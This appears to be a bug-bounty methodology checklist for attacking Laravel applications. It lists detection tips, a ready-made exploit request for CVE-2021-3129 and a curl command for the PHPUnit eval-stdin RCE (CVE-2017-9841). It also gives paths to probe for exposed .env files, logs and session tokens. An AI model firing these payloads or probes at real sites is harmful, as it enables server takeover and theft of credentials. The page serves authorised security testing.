Laravel

Bug-Bounty-Methodology/Technologies/Laravel.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

Detection

Set-Cookie: laravel_session=

Version

https://example.com/composer.json

Sometimes the version is printed

CVE

• CVE-2021-3129 (Remote Code Execution)

POST /_ignition/execute-solution HTTP/1.1
Host: example.com
Accept: application/json
Content-Type: application/json

{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}

1. Laravel 4.8.28 ~ 5.x - PHPUnit Remote Code Execution (CVE-2017-9841)

curl -d "<?php echo php_uname(); ?>" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Exposed environment variable

http://example.com/.env

Vulnerable path:

/.env
/vendor/.env
/lib/.env
/lab/.env
/cronlab/.env
/cron/.env
/core/.env
/core/app/.env
/core/Database/.env
/database/.env
/config/.env
/assets/.env
/app/.env
/apps/.env
/uploads/.env
/sitemaps/.env
/site/.env
/admin/.env
/web/.env
/public/.env
/en/.env
/tools/.env 
/v1/.env
/administrator/.env 
/laravel/.env

Exposed log files

http://example.com/storage/logs/laravel.log

site.com/laravel-folder/storage/logs/laravel.log/ (Search For token)
site.com/laravel-folder/storage/framework/sessions/ (Active session)

Debug mode

• Try to request to https://example.com using POST method (Error 405)

• Using [] in paramater (ex:example.com/param[]=0)

Laravel FileManager

/laravel-filemanager/

Laravel crypto killer

GitHub - synacktiv/laravel-crypto-killer: A tool designed to exploit bad implementations of decryption mechanisms in Laravel applications.GitHub

Resources

Common Bug Pada LaravelNakanosec